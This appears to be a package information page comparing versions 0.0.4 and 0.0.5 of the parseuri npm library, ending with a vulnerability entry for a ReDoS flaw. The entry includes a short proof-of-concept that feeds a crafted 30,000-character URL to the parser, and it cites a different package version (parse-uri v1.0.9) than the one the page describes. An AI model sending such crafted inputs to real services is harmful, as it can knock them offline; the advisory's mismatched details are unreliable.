Parseuri is a lightweight npm package designed to meticulously dissect a URI into its constituent parts, providing developers with a structured breakdown for easy manipulation and analysis. Version 0.0.5, released in October 2016, builds upon the foundation laid by version 0.0.4, which was released in July 2014. Both versions share the same core functionality: parsing URIs and returning an array representing its components. They both depend on the "better-assert" package, with version 0.0.5 specifying a version range of "~1.0.0", while version 0.0.4 specifying the same range. Both versions use Mocha for testing and are released under the MIT license, granting developers broad freedom in utilizing the library.
The primary distinction lies in the included devDependencies. Version 0.0.5 explicitly includes better-assert as a devDependency with version 1.0.0 while version 0.0.4 does not. The inclusion of better-assert directly in devDependencies of version 0.0.5 might suggest a tighter integration or specific testing needs around assertions during development. The repository URL also differs slightly, with version 0.0.5 using git+https:// and version 0.0.4 using https://. Ultimately, for developers, both versions offer simple URI parsing. Choosing version 0.0.5 might be preferable if the developer wants a more recent version, however, a deeper look into the changes in code is suggested to fully understand their implications.
All the vulnerabilities related to the version 0.0.5 of the package
parse-uri Regular expression Denial of Service (ReDoS)
An issue in parse-uri v1.0.9 allows attackers to cause a Regular expression Denial of Service (ReDoS) via a crafted URL.
async function exploit() {
const parseuri = require("parse-uri");
// This input is designed to cause excessive backtracking in the regex
const craftedInput = 'http://example.com/' + 'a'.repeat(30000) + '?key=value';
const result = await parseuri(craftedInput);
}
await exploit();